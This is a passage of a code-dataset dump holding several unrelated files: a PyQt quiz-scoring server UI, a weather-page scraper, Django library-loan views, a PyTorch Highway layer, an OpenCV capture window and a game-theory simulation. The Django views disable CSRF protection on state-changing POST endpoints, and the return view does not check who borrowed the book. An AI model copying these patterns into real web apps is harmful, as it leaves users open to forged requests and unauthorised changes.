self.line_3.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_3.setObjectName(_fromUtf8(\"line_3\"))\r\n self.line_4 = QtGui.QFrame(Dialog)\r\n self.line_4.setGeometry(QtCore.QRect(10, 170, 981, 20))\r\n self.line_4.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_4.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_4.setObjectName(_fromUtf8(\"line_4\"))\r\n self.line_5 = QtGui.QFrame(Dialog)\r\n self.line_5.setGeometry(QtCore.QRect(10, 210, 981, 20))\r\n self.line_5.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_5.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_5.setObjectName(_fromUtf8(\"line_5\"))\r\n self.line_6 = QtGui.QFrame(Dialog)\r\n self.line_6.setGeometry(QtCore.QRect(10, 250, 981, 20))\r\n self.line_6.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_6.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_6.setObjectName(_fromUtf8(\"line_6\"))\r\n self.line_7 = QtGui.QFrame(Dialog)\r\n self.line_7.setGeometry(QtCore.QRect(10, 290, 981, 20))\r\n self.line_7.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_7.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_7.setObjectName(_fromUtf8(\"line_7\"))\r\n self.line_1 = QtGui.QFrame(Dialog)\r\n self.line_1.setGeometry(QtCore.QRect(10, 50, 981, 20))\r\n self.line_1.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_1.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_1.setObjectName(_fromUtf8(\"line_1\"))\r\n self.line_9 = QtGui.QFrame(Dialog)\r\n self.line_9.setGeometry(QtCore.QRect(0, 440, 1011, 20))\r\n self.line_9.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_9.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_9.setObjectName(_fromUtf8(\"line_9\"))\r\n self.line_8 = QtGui.QFrame(Dialog)\r\n self.line_8.setGeometry(QtCore.QRect(110, 60, 21, 241))\r\n self.line_8.setFrameShape(QtGui.QFrame.VLine)\r\n self.line_8.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_8.setObjectName(_fromUtf8(\"line_8\"))\r\n\r\n # 题目控制按钮\r\n self.comboboxChooseTeam = QtGui.QComboBox(Dialog)\r\n self.comboboxChooseTeam.setGeometry(QtCore.QRect(160, 330, 191, 23))\r\n self.comboboxChooseTeam.setObjectName(_fromUtf8(\"comboboxChooseTeam\"))\r\n self.btnNextQuestion = QtGui.QPushButton(Dialog)\r\n self.btnNextQuestion.setGeometry(QtCore.QRect(380, 330, 75, 23))\r\n self.btnNextQuestion.setObjectName(_fromUtf8(\"btnNextQuestion\"))\r\n # 
self.btnLastQuestion = QtGui.QPushButton(Dialog)\r\n # self.btnLastQuestion.setGeometry(QtCore.QRect(490, 330, 75, 23))\r\n # self.btnLastQuestion.setObjectName(_fromUtf8(\"btnLastQuestion\"))\r\n\r\n # 暂停时间按钮\r\n self.btnTimePause = QtGui.QPushButton(Dialog)\r\n self.btnTimePause.setGeometry(QtCore.QRect(600, 330, 75, 23))\r\n self.btnTimePause.setObjectName(_fromUtf8(\"btnTimePause\"))\r\n\r\n # 更新按钮\r\n self.btnRefreshAnswer = QtGui.QPushButton(Dialog)\r\n self.btnRefreshAnswer.setGeometry(QtCore.QRect(160, 470, 171, 23))\r\n self.btnRefreshAnswer.setObjectName(_fromUtf8(\"btnRefreshAnswer\"))\r\n self.btnRefreshGrade = QtGui.QPushButton(Dialog)\r\n self.btnRefreshGrade.setGeometry(QtCore.QRect(380, 470, 171, 23))\r\n self.btnRefreshGrade.setObjectName(_fromUtf8(\"btnRefreshGrade\"))\r\n self.btnHide = QtGui.QPushButton(Dialog)\r\n self.btnHide.setGeometry(QtCore.QRect(600, 470, 171, 23))\r\n self.btnHide.setObjectName(_fromUtf8(\"btnHide\"))\r\n\r\n # 退出按钮\r\n self.btnQuit = QtGui.QPushButton(Dialog)\r\n self.btnQuit.setGeometry(QtCore.QRect(800, 470, 171, 23))\r\n self.btnQuit.setObjectName(_fromUtf8(\"btnQuit\"))\r\n\r\n self.retranslateUi(Dialog)\r\n # QtCore.QMetaObject.connectSlotsByName(Dialog)\r\n\r\n def retranslateUi(self, Dialog):\r\n\r\n # 初始化显示文本\r\n self.labelTeam2.setText(_translate(\"Dialog\", \"2-\", None))\r\n self.labelTeam6.setText(_translate(\"Dialog\", \"6-\", None))\r\n self.labelTeam4.setText(_translate(\"Dialog\", \"4-\", None))\r\n self.labelTeam5.setText(_translate(\"Dialog\", \"5-\", None))\r\n self.labelTeam3.setText(_translate(\"Dialog\", \"3-\", None))\r\n self.labelTeam1.setText(_translate(\"Dialog\", \"1-\", None))\r\n self.labelTeam.setText(_translate(\"Dialog\", \"队伍\", None))\r\n self.labelGrade.setText(_translate(\"Dialog\", \"当前分数\", None))\r\n self.labelGradePart1.setText(_translate(\"Dialog\", \"Part I\", None))\r\n self.labelGradePart2.setText(_translate(\"Dialog\", \"Part II\", None))\r\n self.labelGradeControl.setText(_translate(\"Dialog\", \"分数控制\", None))\r\n self.labelGradePart3.setText(_translate(\"Dialog\", \"Part III\", None))\r\n self.labelGradePart4.setText(_translate(\"Dialog\", \"Part IV\", None))\r\n self.btnTeam1Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam1Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam6Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam6Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam1Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam6Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam6Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam2Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam4Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam2Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam5Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam1Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam5Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam2AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam3AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam4AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam5AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam6AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam2Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n 
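# captions for the remaining "+3" bonus buttons (teams 3-6)\r\n        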
self.btnTeam3Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam4Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam5Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam6Add3.setText(_translate(\"Dialog\", \"+3\", None))\r\n self.btnTeam2Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam3Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam4Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam5Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam6Undo.setText(_translate(\"Dialog\", \"撤销\", None))\r\n self.btnTeam1Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam4Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam1Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam5Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam1Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam1Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam3Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam3Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam5Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam1AddX.setText(_translate(\"Dialog\", \"+0\", None))\r\n self.btnTeam5Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam4Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam6Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam2Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam2Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam3Add10.setText(_translate(\"Dialog\", \"+10\", None))\r\n self.btnTeam4Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam4Add20.setText(_translate(\"Dialog\", \"+20\", None))\r\n self.btnTeam2Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.btnTeam3Add15.setText(_translate(\"Dialog\", \"+15\", None))\r\n self.btnTeam5Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam3Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam4Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam6Add25.setText(_translate(\"Dialog\", \"+25\", None))\r\n self.btnTeam2Sub15.setText(_translate(\"Dialog\", \"-15\", None))\r\n self.btnTeam3Add35.setText(_translate(\"Dialog\", \"+35\", None))\r\n self.labelChooseTeam.setText(_translate(\"Dialog\", \"题目控制\", None))\r\n self.labelShowControl.setText(_translate(\"Dialog\", \"展示更新\", None))\r\n # self.comboboxChooseTeam.setText(_translate(\"Dialog\", \"全部\", None))\r\n self.btnNextQuestion.setText(_translate(\"Dialog\", \"下一题\", None))\r\n # self.btnLastQuestion.setText(_translate(\"Dialog\", \"上一题\", None))\r\n self.btnTimePause.setText(_translate(\"Dialog\", \"时间暂停\", None))\r\n self.btnRefreshAnswer.setText(_translate(\"Dialog\", \"更新答题情况\", None))\r\n self.btnRefreshGrade.setText(_translate(\"Dialog\", \"更新分数\", None))\r\n self.btnHide.setText(_translate(\"Dialog\", \"隐藏选项\", None))\r\n self.btnQuit.setText(_translate(\"Dialog\", \"退出\", None))\r\n\r\n # 初始化队伍名称\r\n tid = 1\r\n for (label,team) in zip(self.labelTeamList, listTeamName):\r\n label.setText('%d-%s' % (tid, team)) \r\n tid += 1\r\n\r\n # 初始化分数\r\n for (edit,grade) in zip(self.editGradeList, listGrade):\r\n edit.setText(str(grade))\r\n edit.setValidator(QtGui.QIntValidator(edit))\r\n edit.setMaxLength(4)\r\n edit.textChanged.connect(self.updateGrade)\r\n\r\n # 初始化自定义分数输入框\r\n for edit in 
self.editGradeXList:\r\n edit.setText('0')\r\n edit.setValidator(QtGui.QIntValidator(edit))\r\n edit.setMaxLength(3)\r\n edit.textChanged.connect(self.createGradeX)\r\n\r\n # 分数控制按钮绑定\r\n for btn in self.btnGradeList:\r\n btn.clicked.connect(self.changeGrade)\r\n\r\n # 撤销按钮绑定\r\n for btn in self.btnUndoList:\r\n btn.setEnabled(False)\r\n btn.clicked.connect(self.undoGrade)\r\n\r\n # 下一题按钮绑定\r\n self.btnNextQuestion.clicked.connect(self.sendNextQuestion)\r\n\r\n # 上一题按钮绑定\r\n # self.btnLastQuestion.clicked.connect(self.sendLastQuestion)\r\n\r\n # 时间暂停按钮绑定\r\n self.btnTimePause.clicked.connect(self.timePause)\r\n\r\n # 更新答题情况按钮绑定\r\n self.btnRefreshAnswer.clicked.connect(self.refreshAnswerLabel)\r\n\r\n # 更新分数按钮绑定\r\n self.btnRefreshGrade.clicked.connect(self.r.refRank)\r\n\r\n # 隐藏选项按钮绑定\r\n self.btnHide.clicked.connect(self.hideSelection)\r\n\r\n # 退出按钮绑定\r\n self.btnQuit.clicked.connect(Dialog.close)\r\n \r\n\r\n # 初始化队伍选择按钮\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"全部\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍1-建筑学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍2-机械学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍3-信息学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍4-自动化学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍5-仪科学院\", None))\r\n self.comboboxChooseTeam.addItem(_translate(\"Dialog\", \"队伍6-吴健雄学院\", None))\r\n self.comboboxChooseTeam.activated.connect(self.changeTeam)\r\n\r\n\r\n # 更新显示板的信息\r\n def displayInfo(self):\r\n QtGui.QMessageBox.information(Dialog, \"Fortune Client\",\r\n \"The host was not found. Please check the host name and \"\r\n \"port settings.\")\r\n\r\n # 分数控制按钮按下的回调函数,修改分数显示框的分数\r\n def changeGrade(self):\r\n sender = Dialog.sender()\r\n teamNum = sender.objectName()[7]\r\n editTeam = self.editGradeList[int(teamNum)-1]\r\n change = int(sender.text()[1:])\r\n grade = int(editTeam.text())\r\n if sender.text()[0] == '+':\r\n editTeam.setText(str(grade+change))\r\n else:\r\n editTeam.setText(str(grade-change))\r\n\r\n # 撤销按钮的回调函数,撤销分数的修改(只能撤销一次)\r\n def undoGrade(self):\r\n sender = Dialog.sender()\r\n team = int(sender.objectName()[7]) - 1\r\n self.editGradeList[team].setText(gradeTeamList[team][-2])\r\n sender.setEnabled(False)\r\n\r\n # 自定义分数框的回调函数,产生自定义分数\r\n def createGradeX(self):\r\n sender = Dialog.sender()\r\n team = sender.objectName()[8]\r\n index = 6+8*(int(team)-1)\r\n self.btnGradeList[index].setText('+' + sender.text())\r\n\r\n # 队伍选择下拉框的回调函数,选择发送的客户端\r\n def changeTeam(self, index):\r\n global teamId\r\n teamId = index\r\n \r\n # 分数显示框的回调函数,更新分数到数据库\r\n def updateGrade(self):\r\n sender = Dialog.sender()\r\n team = int(sender.objectName()[8]) - 1\r\n self.btnUndoList[team].setEnabled(True)\r\n grade = self.editGradeList[team].text()\r\n gradeTeamList[team].append(grade) # 用列表记录分数,撤销用\r\n mdb.updateScore(team+1,grade) # 更新分数到数据库\r\n\r\n # 发送下一题按钮的回调函数,发送下一题\r\n def sendNextQuestion(self):\r\n global nextQuestionId, currentQuestionId, teamId\r\n nextQuestionId = mdb.getNextQuestionId()\r\n send = str(nextQuestionId) + ',' + ','.join([str(g[1]) for g in mdb.getAllGrade()])\r\n if int(teamId) == 0:\r\n for client in clientDict.values():\r\n client.write(QtCore.QByteArray(str(send)))\r\n self.d.appendInfo('server send question%s to all clients' % (nextQuestionId)) \r\n else:\r\n for client in clientDict.values():\r\n if client.id == str(teamId):\r\n client.write(QtCore.QByteArray(str(send)))\r\n 
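# log which single client the question was pushed to\r\n                    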
self.d.appendInfo('server send question%s to client%s' % (nextQuestionId, client.id))\r\n if client.id == '999':\r\n client.write(QtCore.QByteArray(send))\r\n elif client.id == '998':\r\n client.write(QtCore.QByteArray(send))\r\n currentQuestionId = int(nextQuestionId)\r\n\r\n def sendLastQuestion(self):\r\n pass\r\n \r\n # 时间暂停(恢复)按钮的回调函数,暂定计时\r\n def timePause(self):\r\n global timePause\r\n global teamId\r\n if not timePause:\r\n send = 'stop'\r\n timePause = True\r\n else:\r\n send = 'restart'\r\n timePause = False\r\n if teamId == 0:\r\n for client in clientDict.values():\r\n client.write(QtCore.QByteArray(send))\r\n self.d.appendInfo('server send %s to all clients' % send) \r\n else:\r\n for client in clientDict.values():\r\n if client.id == str(teamId):\r\n client.write(QtCore.QByteArray(send))\r\n self.d.appendInfo('server send %s to client%s' % (send, client.id))\r\n if client.id == '999':\r\n client.write(QtCore.QByteArray(send))\r\n elif client.id == '998':\r\n client.write(QtCore.QByteArray(send))\r\n text = self.btnTimePause.text()\r\n if text == _translate(\"Dialog\", \"时间暂停\", None):\r\n self.btnTimePause.setText(_translate(\"Dialog\", \"取消暂停\", None))\r\n else:\r\n self.btnTimePause.setText(_translate(\"Dialog\", \"时间暂停\", None))\r\n\r\n # 更新答题情况按钮的回调函数,更新答题情况\r\n def refreshAnswerLabel(self):\r\n global currentQuestionId, answerList, teamId\r\n if currentQuestionId <= 20: #题目超过n个会转为针对某个队伍进行更新,所以这里是决定共同必答题数量的地方\r\n self.r.refAll(currentQuestionId, mdb.getAnswerlog(currentQuestionId))\r\n # if currentQuestionId == 20:\r\n # \tif isClearJudge:\r\n # \t\tself.r.clearJudge()\r\n # \tisClearJudge = True\r\n\r\n else:\r\n self.r.clearJudge()\r\n self.r.refOne(currentQuestionId, int(teamId)-1, mdb.getTeamlog(currentQuestionId, teamId))\r\n self.r.refRank()\r\n # self.r.clearJudge()\r\n\r\n # 隐藏选项按钮的回调函数\r\n def hideSelection(self):\r\n global hideSelection\r\n if not hideSelection:\r\n self.btnHide.setText(_translate(\"Dialog\", \"隐藏选项\", None))\r\n self.r.removeSelect()\r\n else:\r\n self.r.showSelect()\r\n self.btnHide.setText(_translate(\"Dialog\", \"恢复显示\", None))\r\n hideSelection = not hideSelection\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtGui.QApplication(sys.argv)\r\n Dialog = QtGui.QDialog()\r\n ui = ControlModule(Dialog)\r\n Dialog.show()\r\n sys.exit(app.exec_())\r\n\r\n","sub_path":"beta2.0/server/Ui_ControlModule.py","file_name":"Ui_ControlModule.py","file_ext":"py","file_size_in_byte":46032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"259426352","text":"# regularEx.py\n# regular expression 에 관한 예제\n\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\n\nhtml = urlopen(\"http://weather.naver.com/rgn/townWetr.nhn?naverRgnCd=09680531\")\nbsObj = BeautifulSoup(html, \"html.parser\")\npmList = bsObj.findAll(\"dt\")\nprint (pmList)\nfor pm in pmList: \n airQuality = pm.get_text(strip=True)\n print (\"1\"+airQuality)\n\n airQuality = re.sub(r'\\(.*?\\)','',airQuality) # (31~88)과 같은 텍스트를 제거. \\(.*?\\) 패턴에 맞는 것은 ''로 substitue\n print (\"2\" + airQuality)\n\n match_air = re.findall(r'[\\d.]+', airQuality) # 숫자 만 추출 \n print (\"3\", match_air)\n\n match_air = str(match_air[0])\n print (\"4\", match_air)\n\n# +++++++++++++++++++++++++++++++++++++++++++\n# pmList = bsObj.findAll(\"dt\")\n# [
<dt>미세먼지 35㎍/㎥보통(31~80)</dt>, \n# <dt>오존 0.037ppm보통(0.041~0.080)</dt>, \n# <dt>통합대기 61보통(51~100)</dt>
]\n\n# airQuality = pm.get_text(strip=True)\n# 미세먼지35㎍/㎥보통(31~80)\n# 오존0.037ppm보통(0.041~0.080)\n# 통합대기61보통(51~100)\n\n# airQuality = re.sub(r'\\(.*?\\)','',airQuality)\n# 미세먼지35㎍/㎥보통\n# 오존0.037ppm보통\n# 통합대기61보통\n\n# match_air = re.findall(r'[\\d.]+', airQuality)\n# ['35']\n# ['0.037']\n# ['61']","sub_path":"regularEx.py","file_name":"regularEx.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"361786271","text":"from django.shortcuts import render,redirect\nfrom django.shortcuts import get_object_or_404\nfrom store.models import *\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom datetime import date\nfrom decimal import Decimal\n\n# Create your views here.\n\ndef index(request):\n return render(request, 'store/index.html')\n\ndef bookDetailView(request, bid):\n template_name = 'store/book_detail.html'\n \n book = get_object_or_404(Book,id=bid)\n num = BookCopy.objects.filter(book__title=book.title,status=True).count()\n\n if(request.user.is_authenticated):\n user = User.objects.get(username = request.user.username)\n ratingofuser = rating.objects.filter(book = book,user = user).count()\n if(ratingofuser>0):\n rate = rating.objects.get(book = book,user = user).rate\n else:\n rate = 0.0\n else:\n rate = 0.0 \n if num==0:\n context = {\n 'book': book, # set this to an instance of the required book\n 'num_available': 'Sorry Book not available', # set this to the number of copies of the book available, or 0 if the book isn't available\n 'rate': rate,\n }\n else:\n context = {\n 'book': book,\n 'num_available': num,\n 'rate': rate,\n }\n # START YOUR CODE HERE\n \n return render(request, template_name, context=context)\n\n\n@csrf_exempt\ndef bookListView(request):\n template_name = 'store/book_list.html'\n\n title = request.GET.get(\"title\")\n author = request.GET.get(\"author\")\n genre = request.GET.get(\"genre\")\n if(title and author and genre):\n books = Book.objects.filter(title=title,author=author,genre=genre)\n elif(title and author):\n books = Book.objects.filter(title=title,author=author)\n elif(title and genre):\n books = Book.objects.filter(title=title,genre=genre)\n elif(author and genre):\n books = Book.objects.filter(author=author,genre=genre)\n elif(title):\n books = Book.objects.filter(title=title)\n elif(author):\n books = Book.objects.filter(author=author)\n elif(genre):\n books = Book.objects.filter(genre=genre)\n else:\n books = Book.objects.all()\n\n context = {\n 'books': books, # set this to the list of required books upon filtering using the GET parameters\n # (i.e. the book search feature will also be implemented in this view)\n }\n\n return render(request, template_name, context=context)\n\n@login_required\ndef viewLoanedBooks(request):\n template_name = 'store/loaned_books.html'\n '''\n The above key 'books' in the context dictionary should contain a list of instances of the \n BookCopy model. 
Only those book copies should be included which have been loaned by the user.\n '''\n # START YOUR CODE HERE\n user = User.objects.get(username = request.user.username)\n books = BookCopy.objects.filter(borrower = user)\n context = {\n 'books': books,\n }\n\n return render(request, template_name, context=context)\n\n@csrf_exempt\n@login_required\ndef loanBookView(request):\n '''\n Check if an instance of the asked book is available.\n If yes, then set the message to 'success', otherwise 'failure'\n '''\n # START YOUR CODE HERE\n book_id = request.POST.get(\"bid\") # get the book id from post data\n book = Book.objects.get(id=book_id)\n bookcopy = BookCopy.objects.filter(book__title=book.title,status=True).first()\n Numberofbooks = BookCopy.objects.filter(book__title=book.title,status=True).count()\n \n if(Numberofbooks != 0):\n user = User.objects.get(username = request.user.username)\n bookcopy.borrower = user\n bookcopy.status = False\n bookcopy.borrow_date = date.today()\n bookcopy.save()\n response_data = {\n 'message': 'success',\n }\n else:\n response_data = {\n 'message': 'failure',\n }\n \n\n return JsonResponse(response_data)\n\n'''\nFILL IN THE BELOW VIEW BY YOURSELF.\nThis view will return the issued book.\nYou need to accept the book id as argument from a post request.\nYou additionally need to complete the returnBook function in the loaned_books.html file\nto make this feature complete\n''' \n@csrf_exempt\n@login_required\ndef returnBookView(request):\n book_id = request.POST.get('bid')\n print(book_id)\n book = BookCopy.objects.get(id=book_id)\n user = User.objects.get(username = request.user.username)\n if(book!=0):\n book.borrower = None\n book.status = True\n book.borrow_date = None\n book.save()\n response_data = {\n 'message': 'success',\n }\n else:\n response_data = {\n 'message': 'failure',\n }\n\n return JsonResponse(response_data)\n\n\n@csrf_exempt\n@login_required\ndef ratingsystem(request):\n if request.method == 'POST':\n rate = request.POST.get('rate')\n bid = request.POST.get('bid')\n book = Book.objects.get(id = bid)\n user = User.objects.get(username = request.user.username)\n rateuser = rating()\n rateuser.user = user\n rateuser.rate = rate\n rateuser.book = book\n availableRateUser = rating.objects.filter(book=book,user=user)\n availableRateUser.delete()\n rateuser.save()\n\n bookRate = rating.objects.filter(book = book)\n sum = 0\n for i in bookRate:\n sum = sum + i.rate\n totalrate = sum/bookRate.count()\n x = Decimal(totalrate)\n rate = round(x,2)\n book.rating = rate\n book.save()\n response_data = {\n 'message': 'success',\n }\n return JsonResponse(response_data)\n","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"573698809","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCS224N 2018-19: Homework 5\n\"\"\"\n\n### YOUR CODE HERE for part 1h\nimport torch\n\nclass Highway(torch.nn.Module):\n def __init__(self,dim):\n \"\"\"\n 初始化一个highway模块\n @param dim(int) : feature map大小,在此网络中输出和输入具有同样大小\n \"\"\"\n\n super(Highway,self).__init__()\n self.shortcut = torch.nn.Linear(dim,dim)\n self.mainroad = torch.nn.Linear(dim,dim)\n self.relu = torch.nn.ReLU()\n self.sigmoid = torch.nn.Sigmoid()\n\n def forward(self,x):\n \"\"\"\n highway正传播\n @param x 卷积网络输出x_conv,张量,维度为(batch_size,dim)\n @returns x_highway 张量,维度为(batch_size,dim)\n \"\"\"\n x_proj = self.shortcut(x)\n x_proj = self.relu(x_proj)\n x_gate 
= self.mainroad(x)\n x_gate = self.sigmoid(x_gate)\n x_highway = torch.mul(x_proj,x_gate) + torch.mul((1 - x_gate),x)\n\n return x_highway\n\n### END YOUR CODE \n\nif __name__ == \"__main__\":\n print('[INFO] 测试Highway模块...')\n batch_size = 3\n dim = 5\n net = Highway(dim)\n x = torch.randn(batch_size,dim)\n output = net.forward(x)\n \n assert (output.size() == (batch_size,dim)),f\"输出张量大小应该为{(batch_size,dim)},而得到的张量大小为{output.size()}\"\n print('[INFO] 测试通过!')","sub_path":"a5_public/highway.py","file_name":"highway.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"256186055","text":"# -*- coding:utf-8 -*-\nimport cv2\nimport numpy as np\nimport datetime\n\nfrom PyQt4 import QtGui, QtCore, uic\nfrom video_screen import VideoScreen\n\nfrom img_process import DetectFace\n\nclass CaptureWindow(QtGui.QMainWindow):\n DEFAULT_FPS = 30\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n self.ui = uic.loadUi('main_window.ui')\n self.stream = cv2.VideoCapture(0)\n\n #nothing\n self.stream.set(1, self.ui.inputCamStream.size().width())\n self.stream.set(1, self.ui.inputCamStream.size().height())\n\n self.videoScreen = VideoScreen(self, self.ui.inputCamStream)\n self.outputScreen = VideoScreen(self, self.ui.outputCanvas)\n\n #button click\n self.ui.keepCapturingCheckBox.stateChanged.connect(self.keepCapturingClicked)\n self.ui.getImageButton.clicked.connect(self.showImage)\n\n self.timer = QtCore.QTimer(self)\n self.timer.timeout.connect(self.queryFrame)\n\n fps = self.stream.get(cv2.CAP_PROP_FPS)\n\n if not fps >= 0: fps = self.DEFAULT_FPS\n self.timer.setInterval(1000 / fps)\n self.timer.start()\n self.ui.show()\n\n def process(self):\n self.videoScreen.onNewFrame(self.frame)\n\n @QtCore.pyqtSlot()\n def queryFrame(self):\n ret, self.frame = self.stream.read()\n self.frame=self.frame[:,79:559]\n if not ret: return\n self.process()\n\n\n @QtCore.pyqtSlot()\n def keepCapturingClicked(self):\n if (self.ui.keepCapturingCheckBox.isChecked()):\n self.timer.start()\n else:\n self.timer.stop()\n @QtCore.pyqtSlot()\n def showImage(self):\n face=DetectFace(self.frame)\n show_face=face.drawFaces() \n self.outputScreen.onNewFrame(show_face)\n\n","sub_path":"main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"592383069","text":"from __future__ import division, print_function\nimport sys, math, numpy as np, networkx as nx\nfrom random import uniform, choice\nfrom pyGoS import Simulation\nfrom pyGoS import random_regular_graph\nfrom pyGoS import accumulated_payoff\nfrom pyGoS import selection_probability\nfrom pyGoS import mutation\n\ndef run_simulation(**kwargs):\n N = kwargs.get('N')\n sims = kwargs.get('sims')\n gens = kwargs.get('gens')\n prefix = kwargs.get('prefix')\n\n gos = np.zeros((N+1, gens+1))\n num = np.zeros((N+1, gens+1), dtype='int')\n\n for _ in range(1,sims+1):\n\n s = Simulation(initnet=random_regular_graph,\n payoff=accumulated_payoff,\n probability=selection_probability,\n postupdate=mutation,\n #init_c=500,\n N=N, k=4,\n weak_pd=False, b=1.01, beta=10, m=0)\n gos[s.j, s.t] += s.gos()\n num[s.j, s.t] += 1\n print('%d sim, %d step %d coop'%(_, s.t, s.j))\n for i in range(gens):\n s.gen()\n gos[s.j, s.t] += s.gos()\n num[s.j, s.t] += 1\n print('%d sim, %d step %d coop'%(_, s.t, s.j))\n\n hdr = ','.join(['j']+['Gen %d'%t\n for t in range(gens+1)])\n gos = 
zip(range(N+1), *zip(*gos.tolist()))\n goscsv = '\\n'.join(map(lambda l: ','.join(map(str, l)), gos))\n num = zip(range(N+1), *zip(*num.tolist()))\n numcsv = '\\n'.join(map(lambda l: ','.join(map(str, l)), num))\n\n prefix = kwargs.get('prefix')\n with open(prefix+'.gossum.csv', 'w') as fp:\n fp.write(hdr+'\\n'+goscsv)\n with open(prefix+'.gosnum.csv', 'w') as fp:\n fp.write(hdr+'\\n'+numcsv)\n\nif __name__ == '__main__':\n prefix = sys.argv[1]\n run_simulation(N=1000, sims=1500, gens=100, prefix=prefix)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"241694031","text":"# -*- coding: utf-8 -*-\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport 